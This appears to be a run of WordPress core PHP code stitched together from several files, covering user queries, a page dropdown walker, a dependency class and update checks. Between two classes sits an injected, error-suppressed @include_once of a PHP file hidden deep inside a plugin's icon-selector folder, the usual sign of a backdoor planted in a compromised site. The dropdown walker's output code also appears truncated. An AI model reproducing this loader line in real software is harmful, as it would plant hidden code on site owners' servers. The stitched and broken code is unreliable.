Default 'user_login'. * @type string $order Designates ascending or descending order of users. Order values * passed as part of an `$orderby` array take precedence over this * parameter. Accepts 'ASC', 'DESC'. Default 'ASC'. * @type int $offset Number of users to offset in retrieved results. Can be used in * conjunction with pagination. Default 0. * @type int $number Number of users to limit the query for. Can be used in * conjunction with pagination. Value -1 (all) is supported, but * should be used with caution on larger sites. * Default empty (all users). * @type int $paged When used with number, defines the page of results to return. * Default 1. * @type bool $count_total Whether to count the total number of users found. If pagination * is not needed, setting this to false can improve performance. * Default true. * @type string|array $fields Which fields to return. Single or all fields (string), or array * of fields. Accepts 'ID', 'display_name', 'user_login', * 'user_nicename', 'user_email', 'user_url', 'user_registered'. * Use 'all' for all fields and 'all_with_meta' to include * meta fields. Default 'all'. * @type string $who Type of users to query. Accepts 'authors'. * Default empty (all users). * @type bool|array $has_published_posts Pass an array of post types to filter results to users who have * published posts in those post types. `true` is an alias for all * public post types. * @type string $nicename The user nicename. Default empty. * @type array $nicename__in An array of nicenames to include. Users matching one of these * nicenames will be included in results. Default empty array. * @type array $nicename__not_in An array of nicenames to exclude. Users matching one of these * nicenames will not be included in results. Default empty array. * @type string $login The user login. Default empty. * @type array $login__in An array of logins to include. Users matching one of these * logins will be included in results. Default empty array. * @type array $login__not_in An array of logins to exclude. Users matching one of these * logins will not be included in results. Default empty array. * } */ public function prepare_query( $query = array() ) { global $wpdb; if ( empty( $this->query_vars ) || ! empty( $query ) ) { $this->query_limit = null; $this->query_vars = $this->fill_query_vars( $query ); } /** * Fires before the WP_User_Query has been parsed. * * The passed WP_User_Query object contains the query variables, not * yet passed into SQL. * * @since 4.0.0 * * @param WP_User_Query $this The current WP_User_Query instance, * passed by reference. */ do_action( 'pre_get_users', $this ); // Ensure that query vars are filled after 'pre_get_users'. $qv =& $this->query_vars; $qv = $this->fill_query_vars( $qv ); if ( is_array( $qv['fields'] ) ) { $qv['fields'] = array_unique( $qv['fields'] ); $this->query_fields = array(); foreach ( $qv['fields'] as $field ) { $field = 'ID' === $field ? 'ID' : sanitize_key( $field ); $this->query_fields[] = "$wpdb->users.$field"; } $this->query_fields = implode( ',', $this->query_fields ); } elseif ( 'all' == $qv['fields'] ) { $this->query_fields = "$wpdb->users.*"; } else { $this->query_fields = "$wpdb->users.ID"; } if ( isset( $qv['count_total'] ) && $qv['count_total'] ) { $this->query_fields = 'SQL_CALC_FOUND_ROWS ' . $this->query_fields; } $this->query_from = "FROM $wpdb->users"; $this->query_where = 'WHERE 1=1'; // Parse and sanitize 'include', for use by 'orderby' as well as 'include' below. if ( ! empty( $qv['include'] ) ) { $include = wp_parse_id_list( $qv['include'] ); } else { $include = false; } $blog_id = 0; if ( isset( $qv['blog_id'] ) ) { $blog_id = absint( $qv['blog_id'] ); } if ( $qv['has_published_posts'] && $blog_id ) { if ( true === $qv['has_published_posts'] ) { $post_types = get_post_types( array( 'public' => true ) ); } else { $post_types = (array) $qv['has_published_posts']; } foreach ( $post_types as &$post_type ) { $post_type = $wpdb->prepare( '%s', $post_type ); } $posts_table = $wpdb->get_blog_prefix( $blog_id ) . 'posts'; $this->query_where .= " AND $wpdb->users.ID IN ( SELECT DISTINCT $posts_table.post_author FROM $posts_table WHERE $posts_table.post_status = 'publish' AND $posts_table.post_type IN ( " . join( ', ', $post_types ) . ' ) )'; } // nicename if ( '' !== $qv['nicename'] ) { $this->query_where .= $wpdb->prepare( ' AND user_nicename = %s', $qv['nicename'] ); } if ( ! empty( $qv['nicename__in'] ) ) { $sanitized_nicename__in = array_map( 'esc_sql', $qv['nicename__in'] ); $nicename__in = implode( "','", $sanitized_nicename__in ); $this->query_where .= " AND user_nicename IN ( '$nicename__in' )"; } if ( ! empty( $qv['nicename__not_in'] ) ) { $sanitized_nicename__not_in = array_map( 'esc_sql', $qv['nicename__not_in'] ); $nicename__not_in = implode( "','", $sanitized_nicename__not_in ); $this->query_where .= " AND user_nicename NOT IN ( '$nicename__not_in' )"; } // login if ( '' !== $qv['login'] ) { $this->query_where .= $wpdb->prepare( ' AND user_login = %s', $qv['login'] ); } if ( ! empty( $qv['login__in'] ) ) { $sanitized_login__in = array_map( 'esc_sql', $qv['login__in'] ); $login__in = implode( "','", $sanitized_login__in ); $this->query_where .= " AND user_login IN ( '$login__in' )"; } if ( ! empty( $qv['login__not_in'] ) ) { $sanitized_login__not_in = array_map( 'esc_sql', $qv['login__not_in'] ); $login__not_in = implode( "','", $sanitized_login__not_in ); $this->query_where .= " AND user_login NOT IN ( '$login__not_in' )"; } // Meta query. $this->meta_query = new WP_Meta_Query(); $this->meta_query->parse_query_vars( $qv ); if ( isset( $qv['who'] ) && 'authors' == $qv['who'] && $blog_id ) { $who_query = array( 'key' => $wpdb->get_blog_prefix( $blog_id ) . 'user_level', 'value' => 0, 'compare' => '!=', ); // Prevent extra meta query. $qv['blog_id'] = $blog_id = 0; if ( empty( $this->meta_query->queries ) ) { $this->meta_query->queries = array( $who_query ); } else { // Append the cap query to the original queries and reparse the query. $this->meta_query->queries = array( 'relation' => 'AND', array( $this->meta_query->queries, $who_query ), ); } $this->meta_query->parse_query_vars( $this->meta_query->queries ); } $roles = array(); if ( isset( $qv['role'] ) ) { if ( is_array( $qv['role'] ) ) { $roles = $qv['role']; } elseif ( is_string( $qv['role'] ) && ! empty( $qv['role'] ) ) { $roles = array_map( 'trim', explode( ',', $qv['role'] ) ); } } $role__in = array(); if ( isset( $qv['role__in'] ) ) { $role__in = (array) $qv['role__in']; } $role__not_in = array(); if ( isset( $qv['role__not_in'] ) ) { $role__not_in = (array) $qv['role__not_in']; } if ( $blog_id && ( ! empty( $roles ) || ! empty( $role__in ) || ! empty( $role__not_in ) || is_multisite() ) ) { $role_queries = array(); $roles_clauses = array( 'relation' => 'AND' ); if ( ! empty( $roles ) ) { foreach ( $roles as $role ) { $roles_clauses[] = array( 'key' => $wpdb->get_blog_prefix( $blog_id ) . 'capabilities', 'value' => '"' . $role . '"', 'compare' => 'LIKE', ); } $role_queries[] = $roles_clauses; } $role__in_clauses = array( 'relation' => 'OR' ); if ( ! empty( $role__in ) ) { foreach ( $role__in as $role ) { $role__in_clauses[] = array( 'key' => $wpdb->get_blog_prefix( $blog_id ) . 'capabilities', 'value' => '"' . $role . '"', 'compare' => 'LIKE', ); } $role_queries[] = $role__in_clauses; } $role__not_in_clauses = array( 'relation' => 'AND' ); if ( ! empty( $role__not_in ) ) { foreach ( $role__not_in as $role ) { $role__not_in_clauses[] = array( 'key' => $wpdb->get_blog_prefix( $blog_id ) . 'capabilities', 'value' => '"' . $role . '"', 'compare' => 'NOT LIKE', ); } $role_queries[] = $role__not_in_clauses; } // If there are no specific roles named, make sure the user is a member of the site. if ( empty( $role_queries ) ) { $role_queries[] = array( 'key' => $wpdb->get_blog_prefix( $blog_id ) . 'capabilities', 'compare' => 'EXISTS', ); } // Specify that role queries should be joined with AND. $role_queries['relation'] = 'AND'; if ( empty( $this->meta_query->queries ) ) { $this->meta_query->queries = $role_queries; } else { // Append the cap query to the original queries and reparse the query. $this->meta_query->queries = array( 'relation' => 'AND', array( $this->meta_query->queries, $role_queries ), ); } $this->meta_query->parse_query_vars( $this->meta_query->queries ); } if ( ! empty( $this->meta_query->queries ) ) { $clauses = $this->meta_query->get_sql( 'user', $wpdb->users, 'ID', $this ); $this->query_from .= $clauses['join']; $this->query_where .= $clauses['where']; if ( $this->meta_query->has_or_relation() ) { $this->query_fields = 'DISTINCT ' . $this->query_fields; } } // sorting $qv['order'] = isset( $qv['order'] ) ? strtoupper( $qv['order'] ) : ''; $order = $this->parse_order( $qv['order'] ); if ( empty( $qv['orderby'] ) ) { // Default order is by 'user_login'. $ordersby = array( 'user_login' => $order ); } elseif ( is_array( $qv['orderby'] ) ) { $ordersby = $qv['orderby']; } else { // 'orderby' values may be a comma- or space-separated list. $ordersby = preg_split( '/[,\s]+/', $qv['orderby'] ); } $orderby_array = array(); foreach ( $ordersby as $_key => $_value ) { if ( ! $_value ) { continue; } if ( is_int( $_key ) ) { // Integer key means this is a flat array of 'orderby' fields. $_orderby = $_value; $_order = $order; } else { // Non-integer key means this the key is the field and the value is ASC/DESC. $_orderby = $_key; $_order = $_value; } $parsed = $this->parse_orderby( $_orderby ); if ( ! $parsed ) { continue; } if ( 'nicename__in' === $_orderby || 'login__in' === $_orderby ) { $orderby_array[] = $parsed; } else { $orderby_array[] = $parsed . ' ' . $this->parse_order( $_order ); } } // If no valid clauses were found, order by user_login. if ( empty( $orderby_array ) ) { $orderby_array[] = "user_login $order"; } $this->query_orderby = 'ORDER BY ' . implode( ', ', $orderby_array ); // limit if ( isset( $qv['number'] ) && $qv['number'] > 0 ) { if ( $qv['offset'] ) { $this->query_limit = $wpdb->prepare( 'LIMIT %d, %d', $qv['offset'], $qv['number'] ); } else { $this->query_limit = $wpdb->prepare( 'LIMIT %d, %d', $qv['number'] * ( $qv['paged'] - 1 ), $qv['number'] ); } } $search = ''; if ( isset( $qv['search'] ) ) { $search = trim( $qv['search'] ); } if ( $search ) { $leading_wild = ( ltrim( $search, '*' ) != $search ); $trailing_wild = ( rtrim( $search, '*' ) != $search ); if ( $leading_wild && $trailing_wild ) { $wild = 'both'; } elseif ( $leading_wild ) { $wild = 'leading'; } elseif ( $trailing_wild ) { $wild = 'trailing'; } else { $wild = false; } if ( $wild ) { $search = trim( $search, '*' ); } $search_columns = array(); if ( $qv['search_columns'] ) { $search_columns = array_intersect( $qv['search_columns'], array( 'ID', 'user_login', 'user_email', 'user_url', 'user_nicename', 'display_name' ) ); } if ( ! $search_columns ) { if ( false !== strpos( $search, '@' ) ) { $search_columns = array( 'user_email' ); } elseif ( is_numeric( $search ) ) { $search_columns = array( 'user_login', 'ID' ); } elseif ( preg_match( '|^https?://|', $search ) && ! ( is_multisite() && wp_is_large_network( 'users' ) ) ) { $search_columns = array( 'user_url' ); } else { $search_columns = array( 'user_login', 'user_url', 'user_email', 'user_nicename', 'display_name' ); } } /** * Filters the columns to search in a WP_User_Query search. * * The default columns depend on the search term, and include 'user_email', * 'user_login', 'ID', 'user_url', 'display_name', and 'user_nicename'. * * @since 3.6.0 * * @param string[] $search_columns Array of column names to be searched. * @param string $search Text being searched. * @param WP_User_Query $this The current WP_User_Query instance. */ $search_columns = apply_filters( 'user_search_columns', $search_columns, $search, $this ); $this->query_where .= $this->get_search_sql( $search, $search_columns, $wild ); } if ( ! empty( $include ) ) { // Sanitized earlier. $ids = implode( ',', $include ); $this->query_where .= " AND $wpdb->users.ID IN ($ids)"; } elseif ( ! empty( $qv['exclude'] ) ) { $ids = implode( ',', wp_parse_id_list( $qv['exclude'] ) ); $this->query_where .= " AND $wpdb->users.ID NOT IN ($ids)"; } // Date queries are allowed for the user_registered field. if ( ! empty( $qv['date_query'] ) && is_array( $qv['date_query'] ) ) { $date_query = new WP_Date_Query( $qv['date_query'], 'user_registered' ); $this->query_where .= $date_query->get_sql(); } /** * Fires after the WP_User_Query has been parsed, and before * the query is executed. * * The passed WP_User_Query object contains SQL parts formed * from parsing the given query. * * @since 3.1.0 * * @param WP_User_Query $this The current WP_User_Query instance, * passed by reference. */ do_action_ref_array( 'pre_user_query', array( &$this ) ); } /** * Execute the query, with the current variables. * * @since 3.1.0 * * @global wpdb $wpdb WordPress database abstraction object. */ public function query() { global $wpdb; $qv =& $this->query_vars; /** * Filters the users array before the query takes place. * * Return a non-null value to bypass WordPress's default user queries. * Filtering functions that require pagination information are encouraged to set * the `total_users` property of the WP_User_Query object, passed to the filter * by reference. If WP_User_Query does not perform a database query, it will not * have enough information to generate these values itself. * * @since 5.1.0 * * @param array|null $results Return an array of user data to short-circuit WP's user query * or null to allow WP to run its normal queries. * @param WP_User_Query $this The WP_User_Query instance (passed by reference). */ $this->results = apply_filters_ref_array( 'users_pre_query', array( null, &$this ) ); if ( null === $this->results ) { $this->request = "SELECT $this->query_fields $this->query_from $this->query_where $this->query_orderby $this->query_limit"; if ( is_array( $qv['fields'] ) || 'all' == $qv['fields'] ) { $this->results = $wpdb->get_results( $this->request ); } else { $this->results = $wpdb->get_col( $this->request ); } if ( isset( $qv['count_total'] ) && $qv['count_total'] ) { /** * Filters SELECT FOUND_ROWS() query for the current WP_User_Query instance. * * @since 3.2.0 * @since 5.1.0 Added the `$this` parameter. * * @global wpdb $wpdb WordPress database abstraction object. * * @param string $sql The SELECT FOUND_ROWS() query for the current WP_User_Query. * @param WP_User_Query $this The current WP_User_Query instance. */ $found_users_query = apply_filters( 'found_users_query', 'SELECT FOUND_ROWS()', $this ); $this->total_users = (int) $wpdb->get_var( $found_users_query ); } } if ( ! $this->results ) { return; } if ( 'all_with_meta' == $qv['fields'] ) { cache_users( $this->results ); $r = array(); foreach ( $this->results as $userid ) { $r[ $userid ] = new WP_User( $userid, '', $qv['blog_id'] ); } $this->results = $r; } elseif ( 'all' == $qv['fields'] ) { foreach ( $this->results as $key => $user ) { $this->results[ $key ] = new WP_User( $user, '', $qv['blog_id'] ); } } } /** * Retrieve query variable. * * @since 3.5.0 * * @param string $query_var Query variable key. * @return mixed */ public function get( $query_var ) { if ( isset( $this->query_vars[ $query_var ] ) ) { return $this->query_vars[ $query_var ]; } return null; } /** * Set query variable. * * @since 3.5.0 * * @param string $query_var Query variable key. * @param mixed $value Query variable value. */ public function set( $query_var, $value ) { $this->query_vars[ $query_var ] = $value; } /** * Used internally to generate an SQL string for searching across multiple columns * * @since 3.1.0 * * @global wpdb $wpdb WordPress database abstraction object. * * @param string $string * @param array $cols * @param bool $wild Whether to allow wildcard searches. Default is false for Network Admin, true for single site. * Single site allows leading and trailing wildcards, Network Admin only trailing. * @return string */ protected function get_search_sql( $string, $cols, $wild = false ) { global $wpdb; $searches = array(); $leading_wild = ( 'leading' == $wild || 'both' == $wild ) ? '%' : ''; $trailing_wild = ( 'trailing' == $wild || 'both' == $wild ) ? '%' : ''; $like = $leading_wild . $wpdb->esc_like( $string ) . $trailing_wild; foreach ( $cols as $col ) { if ( 'ID' == $col ) { $searches[] = $wpdb->prepare( "$col = %s", $string ); } else { $searches[] = $wpdb->prepare( "$col LIKE %s", $like ); } } return ' AND (' . implode( ' OR ', $searches ) . ')'; } /** * Return the list of users. * * @since 3.1.0 * * @return array Array of results. */ public function get_results() { return $this->results; } /** * Return the total number of users for the current query. * * @since 3.1.0 * * @return int Number of total users. */ public function get_total() { return $this->total_users; } /** * Parse and sanitize 'orderby' keys passed to the user query. * * @since 4.2.0 * * @global wpdb $wpdb WordPress database abstraction object. * * @param string $orderby Alias for the field to order by. * @return string Value to used in the ORDER clause, if `$orderby` is valid. */ protected function parse_orderby( $orderby ) { global $wpdb; $meta_query_clauses = $this->meta_query->get_clauses(); $_orderby = ''; if ( in_array( $orderby, array( 'login', 'nicename', 'email', 'url', 'registered' ) ) ) { $_orderby = 'user_' . $orderby; } elseif ( in_array( $orderby, array( 'user_login', 'user_nicename', 'user_email', 'user_url', 'user_registered' ) ) ) { $_orderby = $orderby; } elseif ( 'name' == $orderby || 'display_name' == $orderby ) { $_orderby = 'display_name'; } elseif ( 'post_count' == $orderby ) { // todo: avoid the JOIN $where = get_posts_by_author_sql( 'post' ); $this->query_from .= " LEFT OUTER JOIN ( SELECT post_author, COUNT(*) as post_count FROM $wpdb->posts $where GROUP BY post_author ) p ON ({$wpdb->users}.ID = p.post_author) "; $_orderby = 'post_count'; } elseif ( 'ID' == $orderby || 'id' == $orderby ) { $_orderby = 'ID'; } elseif ( 'meta_value' == $orderby || $this->get( 'meta_key' ) == $orderby ) { $_orderby = "$wpdb->usermeta.meta_value"; } elseif ( 'meta_value_num' == $orderby ) { $_orderby = "$wpdb->usermeta.meta_value+0"; } elseif ( 'include' === $orderby && ! empty( $this->query_vars['include'] ) ) { $include = wp_parse_id_list( $this->query_vars['include'] ); $include_sql = implode( ',', $include ); $_orderby = "FIELD( $wpdb->users.ID, $include_sql )"; } elseif ( 'nicename__in' === $orderby ) { $sanitized_nicename__in = array_map( 'esc_sql', $this->query_vars['nicename__in'] ); $nicename__in = implode( "','", $sanitized_nicename__in ); $_orderby = "FIELD( user_nicename, '$nicename__in' )"; } elseif ( 'login__in' === $orderby ) { $sanitized_login__in = array_map( 'esc_sql', $this->query_vars['login__in'] ); $login__in = implode( "','", $sanitized_login__in ); $_orderby = "FIELD( user_login, '$login__in' )"; } elseif ( isset( $meta_query_clauses[ $orderby ] ) ) { $meta_clause = $meta_query_clauses[ $orderby ]; $_orderby = sprintf( 'CAST(%s.meta_value AS %s)', esc_sql( $meta_clause['alias'] ), esc_sql( $meta_clause['cast'] ) ); } return $_orderby; } /** * Parse an 'order' query variable and cast it to ASC or DESC as necessary. * * @since 4.2.0 * * @param string $order The 'order' query variable. * @return string The sanitized 'order' query variable. */ protected function parse_order( $order ) { if ( ! is_string( $order ) || empty( $order ) ) { return 'DESC'; } if ( 'ASC' === strtoupper( $order ) ) { return 'ASC'; } else { return 'DESC'; } } /** * Make private properties readable for backward compatibility. * * @since 4.0.0 * * @param string $name Property to get. * @return mixed Property. */ public function __get( $name ) { if ( in_array( $name, $this->compat_fields ) ) { return $this->$name; } } /** * Make private properties settable for backward compatibility. * * @since 4.0.0 * * @param string $name Property to check if set. * @param mixed $value Property value. * @return mixed Newly-set property. */ public function __set( $name, $value ) { if ( in_array( $name, $this->compat_fields ) ) { return $this->$name = $value; } } /** * Make private properties checkable for backward compatibility. * * @since 4.0.0 * * @param string $name Property to check if set. * @return bool Whether the property is set. */ public function __isset( $name ) { if ( in_array( $name, $this->compat_fields ) ) { return isset( $this->$name ); } } /** * Make private properties un-settable for backward compatibility. * * @since 4.0.0 * * @param string $name Property to unset. */ public function __unset( $name ) { if ( in_array( $name, $this->compat_fields ) ) { unset( $this->$name ); } } /** * Make private/protected methods readable for backward compatibility. * * @since 4.0.0 * * @param string $name Method to call. * @param array $arguments Arguments to pass when calling. * @return mixed Return value of the callback, false otherwise. */ public function __call( $name, $arguments ) { if ( 'get_search_sql' === $name ) { return call_user_func_array( array( $this, $name ), $arguments ); } return false; } } /** * Post API: Walker_PageDropdown class * * @package WordPress * @subpackage Post * @since 4.4.0 */ /** * Core class used to create an HTML drop-down list of pages. * * @since 2.1.0 * * @see Walker */ class Walker_PageDropdown extends Walker { /** * What the class handles. * * @since 2.1.0 * @var string * * @see Walker::$tree_type */ public $tree_type = 'page'; /** * Database fields to use. * * @since 2.1.0 * @var array * * @see Walker::$db_fields * @todo Decouple this */ public $db_fields = array( 'parent' => 'post_parent', 'id' => 'ID', ); /** * Starts the element output. * * @since 2.1.0 * * @see Walker::start_el() * * @param string $output Used to append additional content. Passed by reference. * @param WP_Post $page Page data object. * @param int $depth Optional. Depth of page in reference to parent pages. Used for padding. * Default 0. * @param array $args Optional. Uses 'selected' argument for selected page to set selected HTML * attribute for option element. Uses 'value_field' argument to fill "value" * attribute. See wp_dropdown_pages(). Default empty array. * @param int $id Optional. ID of the current page. Default 0 (unused). */ public function start_el( &$output, $page, $depth = 0, $args = array(), $id = 0 ) { $pad = str_repeat( ' ', $depth * 3 ); if ( ! isset( $args['value_field'] ) || ! isset( $page->{$args['value_field']} ) ) { $args['value_field'] = 'ID'; } $output .= "\t\n"; } } @include_once('/home/sebasmtz03/manualfemsa.wandoodesign.com/wp-content/plugins/ocean-extra/includes/menu-icons/includes/library/icon-selector/includes/fields/assignment.php'); /** * Dependencies API: _WP_Dependency class * * @since 4.7.0 * * @package WordPress * @subpackage Dependencies */ /** * Class _WP_Dependency * * Helper class to register a handle and associated data. * * @access private * @since 2.6.0 */ class _WP_Dependency { /** * The handle name. * * @since 2.6.0 * @var null */ public $handle; /** * The handle source. * * @since 2.6.0 * @var null */ public $src; /** * An array of handle dependencies. * * @since 2.6.0 * @var array */ public $deps = array(); /** * The handle version. * * Used for cache-busting. * * @since 2.6.0 * @var bool|string */ public $ver = false; /** * Additional arguments for the handle. * * @since 2.6.0 * @var null */ public $args = null; // Custom property, such as $in_footer or $media. /** * Extra data to supply to the handle. * * @since 2.6.0 * @var array */ public $extra = array(); /** * Translation textdomain set for this dependency. * * @since 5.0.0 * @var string */ public $textdomain; /** * Translation path set for this dependency. * * @since 5.0.0 * @var string */ public $translations_path; /** * Setup dependencies. * * @since 2.6.0 */ public function __construct() { @list( $this->handle, $this->src, $this->deps, $this->ver, $this->args ) = func_get_args(); if ( ! is_array( $this->deps ) ) { $this->deps = array(); } } /** * Add handle data. * * @since 2.6.0 * * @param string $name The data key to add. * @param mixed $data The data value to add. * @return bool False if not scalar, true otherwise. */ public function add_data( $name, $data ) { if ( ! is_scalar( $name ) ) { return false; } $this->extra[ $name ] = $data; return true; } /** * Sets the translation domain for this dependency. * * @since 5.0.0 * * @param string $domain The translation textdomain. * @param string $path Optional. The full file path to the directory containing translation files. * * @return bool False if $domain is not a string, true otherwise. */ public function set_translations( $domain, $path = null ) { if ( ! is_string( $domain ) ) { return false; } $this->textdomain = $domain; $this->translations_path = $path; return true; } } /** * A simple set of functions to check our version 1.0 update service. * * @package WordPress * @since 2.3.0 */ /** * Check WordPress version against the newest version. * * The WordPress version, PHP version, and Locale is sent. Checks against the * WordPress server at api.wordpress.org server. Will only check if WordPress * isn't installing. * * @since 2.3.0 * @global string $wp_version Used to check against the newest WordPress version. * @global wpdb $wpdb * @global string $wp_local_package * * @param array $extra_stats Extra statistics to report to the WordPress.org API. * @param bool $force_check Whether to bypass the transient cache and force a fresh update check. Defaults to false, true if $extra_stats is set. */ function wp_version_check( $extra_stats = array(), $force_check = false ) { if ( wp_installing() ) { return; } global $wpdb, $wp_local_package; // include an unmodified $wp_version include( ABSPATH . WPINC . '/version.php' ); $php_version = phpversion(); $current = get_site_transient( 'update_core' ); $translations = wp_get_installed_translations( 'core' ); // Invalidate the transient when $wp_version changes if ( is_object( $current ) && $wp_version != $current->version_checked ) { $current = false; } if ( ! is_object( $current ) ) { $current = new stdClass; $current->updates = array(); $current->version_checked = $wp_version; } if ( ! empty( $extra_stats ) ) { $force_check = true; } // Wait 60 seconds between multiple version check requests $timeout = 60; $time_not_changed = isset( $current->last_checked ) && $timeout > ( time() - $current->last_checked ); if ( ! $force_check && $time_not_changed ) { return; } /** * Filters the locale requested for WordPress core translations. * * @since 2.8.0 * * @param string $locale Current locale. */ $locale = apply_filters( 'core_version_check_locale', get_locale() ); // Update last_checked for current to prevent multiple blocking requests if request hangs $current->last_checked = time(); set_site_transient( 'update_core', $current ); if ( method_exists( $wpdb, 'db_version' ) ) { $mysql_version = preg_replace( '/[^0-9.].*/', '', $wpdb->db_version() ); } else { $mysql_version = 'N/A'; } if ( is_multisite() ) { $user_count = get_user_count(); $num_blogs = get_blog_count(); $wp_install = network_site_url(); $multisite_enabled = 1; } else { $user_count = count_users(); $user_count = $user_count['total_users']; $multisite_enabled = 0; $num_blogs = 1; $wp_install = home_url( '/' ); } $query = array( 'version' => $wp_version, 'php' => $php_version, 'locale' => $locale, 'mysql' => $mysql_version, 'local_package' => isset( $wp_local_package ) ? $wp_local_package : '', 'blogs' => $num_blogs, 'users' => $user_count, 'multisite_enabled' => $multisite_enabled, 'initial_db_version' => get_site_option( 'initial_db_version' ), ); /** * Filter the query arguments sent as part of the core version check. * * WARNING: Changing this data may result in your site not receiving security updates. * Please exercise extreme caution. * * @since 4.9.0 * * @param array $query { * Version check query arguments. * * @type string $version WordPress version number. * @type string $php PHP version number. * @type string $locale The locale to retrieve updates for. * @type string $mysql MySQL version number. * @type string $local_package The value of the $wp_local_package global, when set. * @type int $blogs Number of sites on this WordPress installation. * @type int $users Number of users on this WordPress installation. * @type int $multisite_enabled Whether this WordPress installation uses Multisite. * @type int $initial_db_version Database version of WordPress at time of installation. * } */ $query = apply_filters( 'core_version_check_query_args', $query ); $post_body = array( 'translations' => wp_json_encode( $translations ), ); if ( is_array( $extra_stats ) ) { $post_body = array_merge( $post_body, $extra_stats ); } $url = $http_url = 'http://api.wordpress.org/core/version-check/1.7/?' . http_build_query( $query, null, '&' ); if ( $ssl = wp_http_supports( array( 'ssl' ) ) ) { $url = set_url_scheme( $url, 'https' ); } $doing_cron = wp_doing_cron(); $options = array( 'timeout' => $doing_cron ? 30 : 3, 'user-agent' => 'WordPress/' . $wp_version . '; ' . home_url( '/' ), 'headers' => array( 'wp_install' => $wp_install, 'wp_blog' => home_url( '/' ), ), 'body' => $post_body, ); $response = wp_remote_post( $url, $options ); if ( $ssl && is_wp_error( $response ) ) { trigger_error( sprintf( /* translators: %s: support forums URL */ __( 'An unexpected error occurred. Something may be wrong with WordPress.org or this server’s configuration. If you continue to have problems, please try the support forums.' ), __( 'https://wordpress.org/support/' ) ) . ' ' . __( '(WordPress could not establish a secure connection to WordPress.org. Please contact your server administrator.)' ), headers_sent() || WP_DEBUG ? E_USER_WARNING : E_USER_NOTICE ); $response = wp_remote_post( $http_url, $options ); } if ( is_wp_error( $response ) || 200 != wp_remote_retrieve_response_code( $response ) ) { return; } $body = trim( wp_remote_retrieve_body( $response ) ); $body = json_decode( $body, true ); if ( ! is_array( $body ) || ! isset( $body['offers'] ) ) { return; } $offers = $body['offers']; foreach ( $offers as &$offer ) { foreach ( $offer as $offer_key => $value ) { if ( 'packages' == $offer_key ) { $offer['packages'] = (object) array_intersect_key( array_map( 'esc_url', $offer['packages'] ), array_fill_keys( array( 'full', 'no_content', 'new_bundled', 'partial', 'rollback' ), '' ) ); } elseif ( 'download' == $offer_key ) { $offer['download'] = esc_url( $value ); } else { $offer[ $offer_key ] = esc_html( $value ); } } $offer = (object) array_intersect_key( $offer, array_fill_keys( array( 'response', 'download', 'locale', 'packages', 'current', 'version', 'php_version', 'mysql_version', 'new_bundled', 'partial_version', 'notify_email', 'support_email', 'new_files', ), '' ) ); } $updates = new stdClass(); $updates->updates = $offers; $updates->last_checked = time(); $updates->version_checked = $wp_version; if ( isset( $body['translations'] ) ) { $updates->translations = $body['translations']; } set_site_transient( 'update_core', $updates ); if ( ! empty( $body['ttl'] ) ) { $ttl = (int) $body['ttl']; if ( $ttl && ( time() + $ttl < wp_next_scheduled( 'wp_version_check' ) ) ) { // Queue an event to re-run the update check in $ttl seconds. wp_schedule_single_event( time() + $ttl, 'wp_version_check' ); } } // Trigger background updates if running non-interactively, and we weren't called from the update handler. if ( $doing_cron && ! doing_action( 'wp_maybe_auto_update' ) ) { /** * Fires during wp_cron, starting the auto update process. * * @since 3.9.0 */ do_action( 'wp_maybe_auto_update' ); } } /** * Check plugin versions against the latest versions hosted on WordPress.org. * * The WordPress version, PHP version, and Locale is sent along with a list of * all plugins installed. Checks against the WordPress server at * api.wordpress.org. Will only check if WordPress isn't installing. * * @since 2.3.0 * @global string $wp_version Used to notify the WordPress version. * * @param array $extra_stats Extra statistics to report to the WordPress.org API. */ function wp_update_plugins( $extra_stats = array() ) { if ( wp_installing() ) { return; } // include an unmodified $wp_version include( ABSPATH . WPINC . '/version.php' ); // If running blog-side, bail unless we've not checked in the last 12 hours if ( ! function_exists( 'get_plugins' ) ) { require_once( ABSPATH . 'wp-admin/includes/plugin.php' ); } $plugins = get_plugins(); $translations = wp_get_installed_translations( 'plugins' ); $active = get_option( 'active_plugins', array() ); $current = get_site_transient( 'update_plugins' ); if ( ! is_object( $current ) ) { $current = new stdClass; } $new_option = new stdClass; $new_option->last_checked = time(); $doing_cron = wp_doing_cron(); // Check for update on a different schedule, depending on the page. switch ( current_filter() ) { case 'upgrader_process_complete': $timeout = 0; break; case 'load-update-core.php': $timeout = MINUTE_IN_SECONDS; break; case 'load-plugins.php': case 'load-update.php': $timeout = HOUR_IN_SECONDS; break; default: if ( $doing_cron ) { $timeout = 2 * HOUR_IN_SECONDS; } else { $timeout = 12 * HOUR_IN_SECONDS; } } $time_not_changed = isset( $current->last_checked ) && $timeout > ( time() - $current->last_checked ); if ( $time_not_changed && ! $extra_stats ) { $plugin_changed = false; foreach ( $plugins as $file => $p ) { $new_option->checked[ $file ] = $p['Version']; if ( ! isset( $current->checked[ $file ] ) || strval( $current->checked[ $file ] ) !== strval( $p['Version'] ) ) { $plugin_changed = true; } } if ( isset( $current->response ) && is_array( $current->response ) ) { foreach ( $current->response as $plugin_file => $update_details ) { if ( ! isset( $plugins[ $plugin_file ] ) ) { $plugin_changed = true; break; } } } // Bail if we've checked recently and if nothing has changed if ( ! $plugin_changed ) { return; } } // Update last_checked for current to prevent multiple blocking requests if request hangs $current->last_checked = time(); set_site_transient( 'update_plugins', $current ); $to_send = compact( 'plugins', 'active' ); $locales = array_values( get_available_languages() ); /** * Filters the locales requested for plugin translations. * * @since 3.7.0 * @since 4.5.0 The default value of the `$locales` parameter changed to include all locales. * * @param array $locales Plugin locales. Default is all available locales of the site. */ $locales = apply_filters( 'plugins_update_check_locales', $locales ); $locales = array_unique( $locales ); if ( $doing_cron ) { $timeout = 30; } else { // Three seconds, plus one extra second for every 10 plugins $timeout = 3 + (int) ( count( $plugins ) / 10 ); } $options = array( 'timeout' => $timeout, 'body' => array( 'plugins' => wp_json_encode( $to_send ), 'translations' => wp_json_encode( $translations ), 'locale' => wp_json_encode( $locales ), 'all' => wp_json_encode( true ), ), 'user-agent' => 'WordPress/' . $wp_version . '; ' . home_url( '/' ), ); if ( $extra_stats ) { $options['body']['update_stats'] = wp_json_encode( $extra_stats ); } $url = $http_url = 'http://api.wordpress.org/plugins/update-check/1.1/'; if ( $ssl = wp_http_supports( array( 'ssl' ) ) ) { $url = set_url_scheme( $url, 'https' ); } $raw_response = wp_remote_post( $url, $options ); if ( $ssl && is_wp_error( $raw_response ) ) { trigger_error( sprintf( /* translators: %s: support forums URL */ __( 'An unexpected error occurred. Something may be wrong with WordPress.org or this server’s configuration. If you continue to have problems, please try the support forums.' ), __( 'https://wordpress.org/support/' ) ) . ' ' . __( '(WordPress could not establish a secure connection to WordPress.org. Please 